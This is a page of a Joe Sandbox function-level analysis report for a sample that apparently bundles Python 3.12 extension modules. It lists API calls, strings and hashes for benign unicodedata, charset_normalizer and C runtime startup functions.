Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: CompareUnicode_$DeallocStringWith
String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
API String ID: 1004266020-3528878251
Opcode ID: af26892aff1d8045e963e496d2751d5e301b46a530bc7b3c9d9d9e4ca357d1c9
Instruction ID: 10123f9871fe67a0c68ec444db2a7b31046f076ed9ea2e682da427404283815f
Opcode Fuzzy Hash: af26892aff1d8045e963e496d2751d5e301b46a530bc7b3c9d9d9e4ca357d1c9
Instruction Fuzzy Hash: 49418FA5E0A743C2EE168B31E55027923A9BF45F84F8840B9ED4E47760EF3DE44A8320

Function 00007FFBAA4624D0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 81COMMON

Download Yara Rule

APIs

PyModule_AddStringConstant.PYTHON312 ref: 00007FFBAA4624F0
PyType_FromSpec.PYTHON312 ref: 00007FFBAA462505
PyModule_AddType.PYTHON312 ref: 00007FFBAA46251D
_Py_Dealloc.PYTHON312 ref: 00007FFBAA463E88

Part of subcall function 00007FFBAA4625C0: _PyObject_GC_New.PYTHON312(?,?,00000000,00007FFBAA462533), ref: 00007FFBAA4625C6
Part of subcall function 00007FFBAA4625C0: PyObject_GC_Track.PYTHON312(?,?,00000000,00007FFBAA462533), ref: 00007FFBAA4625F8

PyModule_AddObject.PYTHON312 ref: 00007FFBAA462557
PyModule_AddObjectRef.PYTHON312 ref: 00007FFBAA46257F
_Py_Dealloc.PYTHON312 ref: 00007FFBAA463E97

Strings

ucd_3_2_0, xrefs: 00007FFBAA46254D
unidata_version, xrefs: 00007FFBAA4624E9
15.0.0, xrefs: 00007FFBAA4624DF
_ucnhash_CAPI, xrefs: 00007FFBAA462575

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Module_$DeallocObjectObject_$ConstantFromSpecStringTrackTypeType_
String ID: 15.0.0$_ucnhash_CAPI$ucd_3_2_0$unidata_version
API String ID: 2663085338-4141011787
Opcode ID: 13d2541d63d5590277e7306063f0ab8f10eec6f80969a73a59eba5495f8f2869
Instruction ID: 1db4a6ac1c7eea16b75a56a8cb2ce40845e1445d2570cba78d79ad8cc8a08260
Opcode Fuzzy Hash: 13d2541d63d5590277e7306063f0ab8f10eec6f80969a73a59eba5495f8f2869
Instruction Fuzzy Hash: 95314EA1E0B643E5F6675B31E824378A2A8AF49F80F4450B5FD0E46699DF3DE4478321

Function 00007FFBAB6B3850 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

PyModule_Create2.PYTHON312 ref: 00007FFBAB6B388A
PyCapsule_New.PYTHON312 ref: 00007FFBAB6B38B1
PyObject_SetAttrString.PYTHON312 ref: 00007FFBAB6B38D4
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B38EA
PyCapsule_New.PYTHON312 ref: 00007FFBAB6B3905
PyObject_SetAttrString.PYTHON312 ref: 00007FFBAB6B3924
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B393A

Strings

init_charset_normalizer___md, xrefs: 00007FFBAB6B391A
charset_normalizer.md__mypyc.exports, xrefs: 00007FFBAB6B38A3
charset_normalizer.md__mypyc.init_charset_normalizer___md, xrefs: 00007FFBAB6B38F7
exports, xrefs: 00007FFBAB6B38CA

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: AttrCapsule_DeallocObject_String$Create2Module_
String ID: charset_normalizer.md__mypyc.exports$charset_normalizer.md__mypyc.init_charset_normalizer___md$exports$init_charset_normalizer___md
API String ID: 2519120496-2411258805
Opcode ID: 6cb80ad11c98d76827863cb71e74507b593be2b67b62d800d4c12a6864baf513
Instruction ID: 449f2630a0458862005f0d60561629d78e2ad23c6d27f6640c69a586bfeed0cd
Opcode Fuzzy Hash: 6cb80ad11c98d76827863cb71e74507b593be2b67b62d800d4c12a6864baf513
Instruction Fuzzy Hash: 9631C8B1A9BA0391EA579BB9EC54674A3B0FF44B94F48A035CE2D067B5EE3CE4448700

Function 00007FFBAA4611B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 152COMMON

Download Yara Rule

APIs

PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFBAA4611E2
PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFBAA4611FA
PyType_IsSubtype.PYTHON312 ref: 00007FFBAA46121D

Part of subcall function 00007FFBAA4612F0: PyMem_Malloc.PYTHON312 ref: 00007FFBAA461377
Part of subcall function 00007FFBAA4612F0: PyMem_Free.PYTHON312 ref: 00007FFBAA461487

PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFBAA46369B

Strings

invalid normalization form, xrefs: 00007FFBAA463733
NFD, xrefs: 00007FFBAA463691
NFKD, xrefs: 00007FFBAA4636D7
NFC, xrefs: 00007FFBAA4611D8
NFKC, xrefs: 00007FFBAA4611F0

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: CompareStringUnicode_With$Mem_$FreeMallocSubtypeType_
String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
API String ID: 1723213316-3528878251
Opcode ID: 9ebbeb7ffb067a2c84aacc1cf291dabc7e77949c11924730220a14a4a7e8ad4f
Instruction ID: 626ad12c0c52b804af88fedc0221b29fc89a322a7ff1692bdc6bce550b1dd53c
Opcode Fuzzy Hash: 9ebbeb7ffb067a2c84aacc1cf291dabc7e77949c11924730220a14a4a7e8ad4f
Instruction Fuzzy Hash: E35170E5E0E293C2FB628B39E4106796399AF52FC4F4451B1ED4A97A85DF3CE4038721

Function 00007FFBAA4643F4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 109COMMON

Download Yara Rule

APIs

_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA464424
PyType_IsSubtype.PYTHON312 ref: 00007FFBAA464487
PyUnicode_FromString.PYTHON312 ref: 00007FFBAA4644A3

Strings

, xrefs: 00007FFBAA464537
decomposition, xrefs: 00007FFBAA46441D
a unicode character, xrefs: 00007FFBAA46440F
%04X, xrefs: 00007FFBAA46454C
argument, xrefs: 00007FFBAA464416

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
String ID: $%04X$a unicode character$argument$decomposition
API String ID: 1318908108-4056541097
Opcode ID: 84a528a47654cdde31738837f18bb607aa473ddf7d16b6eb27ea2fde83817aeb
Instruction ID: 29d9b9687476f9bc39979d2cd07e5cc723260d66fc5d681e7fd956c2bdad148a
Opcode Fuzzy Hash: 84a528a47654cdde31738837f18bb607aa473ddf7d16b6eb27ea2fde83817aeb
Instruction Fuzzy Hash: 6641B6E2A0A682C1EB268B25E9503B92365FF45F94F540275EE5E076C4EF3CD5478320

Function 00007FFBAB6A3880 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PyThreadState_Get.PYTHON312 ref: 00007FFBAB6A38A2
PyErr_Fetch.PYTHON312 ref: 00007FFBAB6A38BA
PyCode_NewEmpty.PYTHON312 ref: 00007FFBAB6A38CD
PyFrame_New.PYTHON312 ref: 00007FFBAB6A38E7
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3902
_PyErr_ChainExceptions1.PYTHON312 ref: 00007FFBAB6A390D
PyErr_Restore.PYTHON312 ref: 00007FFBAB6A393A
PyTraceBack_Here.PYTHON312 ref: 00007FFBAB6A3943
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3957
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A396B

Strings

charset_normalizer\md.py, xrefs: 00007FFBAB6A38C3

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocErr_$Back_ChainCode_EmptyExceptions1FetchFrame_HereRestoreState_ThreadTrace
String ID: charset_normalizer\md.py
API String ID: 1599779757-1392889821
Opcode ID: 929c761034df64e23572057a73fe2c5fab85c31af172243b9a7b6395f97a8051
Instruction ID: efe53b8bc03b7e40497bef10fcbd0188a31f7ab356260b3830cbb1de9bb4fa71
Opcode Fuzzy Hash: 929c761034df64e23572057a73fe2c5fab85c31af172243b9a7b6395f97a8051
Instruction Fuzzy Hash: A6215AB2A1AB4281DA168F65EC542A9B3B4FB89B95F44A035DF6E03B74DF3CD544C700

Function 00007FFBAB6A6E20 Relevance: 18.1, APIs: 12, Instructions: 104threadCOMMON

Download Yara Rule

APIs

PyObject_GC_UnTrack.PYTHON312 ref: 00007FFBAB6A6E2D
_PyTrash_cond.PYTHON312 ref: 00007FFBAB6A6E3F
_PyThreadState_UncheckedGet.PYTHON312 ref: 00007FFBAB6A6E49
_PyTrash_begin.PYTHON312 ref: 00007FFBAB6A6E58
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6E89
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6EB2
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6EDB
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6F04
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6F2D
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6F4F
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A6F78
_PyTrash_end.PYTHON312 ref: 00007FFBAB6A6F93

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
String ID:
API String ID: 2819143443-0
Opcode ID: 34ec5bebfffadac6be9bf9876dce8c975bd5e57f5d382802bd6aac2d38012139
Instruction ID: 4d29d2da611a4e16cbea1d12ca9ba616d43d88b9d0bd435bce7fe135309f6ffd
Opcode Fuzzy Hash: 34ec5bebfffadac6be9bf9876dce8c975bd5e57f5d382802bd6aac2d38012139
Instruction Fuzzy Hash: 5E51A9B290A64281EB564F78D858378B2B1BB45B79F14A239DE3D422F5CF7ED4858300

Function 00007FFBAB631030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFBAB631058
__scrt_initialize_crt.LIBCMT ref: 00007FFBAB63109D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFBAB6310AA
_RTC_Initialize.LIBCMT ref: 00007FFBAB6310D8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFBAB6310FE
__scrt_release_startup_lock.LIBCMT ref: 00007FFBAB631129

Memory Dump Source

Source File: 00000002.00000002.1836553428.00007FFBAB631000.00000020.00000001.01000000.00000027.sdmp, Offset: 00007FFBAB630000, based on PE: true

Associated: 00000002.00000002.1836525586.00007FFBAB630000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 00000002.00000002.1836582037.00007FFBAB632000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 00000002.00000002.1836611692.00007FFBAB634000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab630000_HyZh4pn0RF.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: b83bcfdbda2627b91fecea52bb080c46b8b041ebfc422aeaa466320814e2d747
Instruction ID: 9dbd89682e3c819daa786cc83fd8efac039ffe0622b07ed03a5bc8ebb99fac86
Opcode Fuzzy Hash: b83bcfdbda2627b91fecea52bb080c46b8b041ebfc422aeaa466320814e2d747
Instruction Fuzzy Hash: BF815AA3E0A24746F6529B7EDC412B9E290BF95780F44E435DE6C837B6DF2CE442E600

Function 00007FFBAB621030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFBAB621058
__scrt_initialize_crt.LIBCMT ref: 00007FFBAB62109D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFBAB6210AA
_RTC_Initialize.LIBCMT ref: 00007FFBAB6210D8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFBAB6210FE
__scrt_release_startup_lock.LIBCMT ref: 00007FFBAB621129

Memory Dump Source

Source File: 00000002.00000002.1836441466.00007FFBAB621000.00000020.00000001.01000000.00000028.sdmp, Offset: 00007FFBAB620000, based on PE: true

Associated: 00000002.00000002.1836411766.00007FFBAB620000.00000002.00000001.01000000.00000028.sdmpDownload File
Associated: 00000002.00000002.1836470162.00007FFBAB623000.00000002.00000001.01000000.00000028.sdmpDownload File
Associated: 00000002.00000002.1836497438.00007FFBAB625000.00000002.00000001.01000000.00000028.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab620000_HyZh4pn0RF.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: b665e2aa0a1aafc407c8626279c8168d645185ea6c4bd927f3a78105dbac7c58
Instruction ID: d536db944738c25d11fb37a1c75d49259d5222c2ceaa1b32fc7d86e55f717838
Opcode Fuzzy Hash: b665e2aa0a1aafc407c8626279c8168d645185ea6c4bd927f3a78105dbac7c58
Instruction Fuzzy Hash: E7819BE1E0E24746F6569B7DDC452B9B290BF95780F04E035DE6C877B6DE3CE442A600

Function 00007FFBAB611030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFBAB611058
__scrt_initialize_crt.LIBCMT ref: 00007FFBAB61109D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFBAB6110AA
_RTC_Initialize.LIBCMT ref: 00007FFBAB6110D8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFBAB6110FE
__scrt_release_startup_lock.LIBCMT ref: 00007FFBAB611129

Memory Dump Source

Source File: 00000002.00000002.1836320124.00007FFBAB611000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FFBAB610000, based on PE: true

Associated: 00000002.00000002.1836281824.00007FFBAB610000.00000002.00000001.01000000.00000029.sdmpDownload File
Associated: 00000002.00000002.1836352217.00007FFBAB613000.00000002.00000001.01000000.00000029.sdmpDownload File
Associated: 00000002.00000002.1836382631.00007FFBAB615000.00000002.00000001.01000000.00000029.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab610000_HyZh4pn0RF.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: b665e2aa0a1aafc407c8626279c8168d645185ea6c4bd927f3a78105dbac7c58
Instruction ID: 4a84bc58a0c6f931ef019ad03a609b7e33ccb0817ebf08dd9955e3950ddca6d0
Opcode Fuzzy Hash: b665e2aa0a1aafc407c8626279c8168d645185ea6c4bd927f3a78105dbac7c58
Instruction Fuzzy Hash: 16818EE0E1A24746F6529B7EFC422B9F290AF55780F54E037DD2D877B6DE2CE441A600

Function 00007FFBAB6B39C0 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFBAB6B39E8
__scrt_initialize_crt.LIBCMT ref: 00007FFBAB6B3A2D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFBAB6B3A3A
_RTC_Initialize.LIBCMT ref: 00007FFBAB6B3A68
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFBAB6B3A8E
__scrt_release_startup_lock.LIBCMT ref: 00007FFBAB6B3AB9

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 96e2149260328018f2ee9c3f905d278b01a8d9e20d367414482ed3a890371b1c
Instruction ID: 77f930f337dfa10b92e6f62a79360744b1e604fe1d6b9ea2bbf6e14d589f5dae
Opcode Fuzzy Hash: 96e2149260328018f2ee9c3f905d278b01a8d9e20d367414482ed3a890371b1c
Instruction Fuzzy Hash: 11818AA1F8A20345FA56ABFDDC412B9A2B0FF55780F54E435DD2D473B6DE2CE8458600

Function 00007FFBAB651030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFBAB651058
__scrt_initialize_crt.LIBCMT ref: 00007FFBAB65109D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFBAB6510AA
_RTC_Initialize.LIBCMT ref: 00007FFBAB6510D8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFBAB6510FE
__scrt_release_startup_lock.LIBCMT ref: 00007FFBAB651129

Memory Dump Source

Source File: 00000002.00000002.1836808470.00007FFBAB651000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FFBAB650000, based on PE: true

Associated: 00000002.00000002.1836782497.00007FFBAB650000.00000002.00000001.01000000.00000025.sdmpDownload File
Associated: 00000002.00000002.1836836073.00007FFBAB653000.00000002.00000001.01000000.00000025.sdmpDownload File
Associated: 00000002.00000002.1836866266.00007FFBAB655000.00000002.00000001.01000000.00000025.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab650000_HyZh4pn0RF.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: b665e2aa0a1aafc407c8626279c8168d645185ea6c4bd927f3a78105dbac7c58
Instruction ID: 7cc2b9b3fa7bb8677d3a3e3c447fc836cf32fb9a0fc084cc44f882c54483562f
Opcode Fuzzy Hash: b665e2aa0a1aafc407c8626279c8168d645185ea6c4bd927f3a78105dbac7c58
Instruction Fuzzy Hash: 8B8190E0E0A24746F6629B7DDC41AB9E290AF55B80F04E335DD2E477B6DE3CE461A700

Function 00007FFBAA462740 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFBAA462768
__scrt_initialize_crt.LIBCMT ref: 00007FFBAA4627AD
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFBAA4627BA
_RTC_Initialize.LIBCMT ref: 00007FFBAA4627E8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFBAA46280E
__scrt_release_startup_lock.LIBCMT ref: 00007FFBAA462839

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
Instruction ID: 52b2f3ae44961e8fa64ebf049b83306ffb60d0fe39ed8dedbb172a303ae7a2b1
Opcode Fuzzy Hash: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
Instruction Fuzzy Hash: AF81C0E0F0A383E6F6529B75D4412B9A298AF85F80F0481B5FD0C53796DE3CE9478720

Function 00007FFBAB661030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFBAB661058
__scrt_initialize_crt.LIBCMT ref: 00007FFBAB66109D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFBAB6610AA
_RTC_Initialize.LIBCMT ref: 00007FFBAB6610D8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFBAB6610FE
__scrt_release_startup_lock.LIBCMT ref: 00007FFBAB661129

Memory Dump Source

Source File: 00000002.00000002.1836922455.00007FFBAB661000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBAB660000, based on PE: true

Associated: 00000002.00000002.1836892940.00007FFBAB660000.00000002.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1836950286.00007FFBAB665000.00000002.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1836978076.00007FFBAB666000.00000004.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1837005009.00007FFBAB667000.00000002.00000001.01000000.00000024.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab660000_HyZh4pn0RF.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: b369c7a3d4aeae5ad645d113c91f8a0bcd0fe91402e59b6f2cf4063d5a92ee2c
Instruction ID: fa347068b252684c4129ac4384422d1cd14a9f1c0cb7f23971b366d0d8b7f939
Opcode Fuzzy Hash: b369c7a3d4aeae5ad645d113c91f8a0bcd0fe91402e59b6f2cf4063d5a92ee2c
Instruction Fuzzy Hash: E3815DA0E0A24746FA5A9B7DDC712B9D290AF57780F44F13DDD2D836B6DE3CE841A600

Function 00007FFBAB5F1030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFBAB5F1058
__scrt_initialize_crt.LIBCMT ref: 00007FFBAB5F109D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFBAB5F10AA
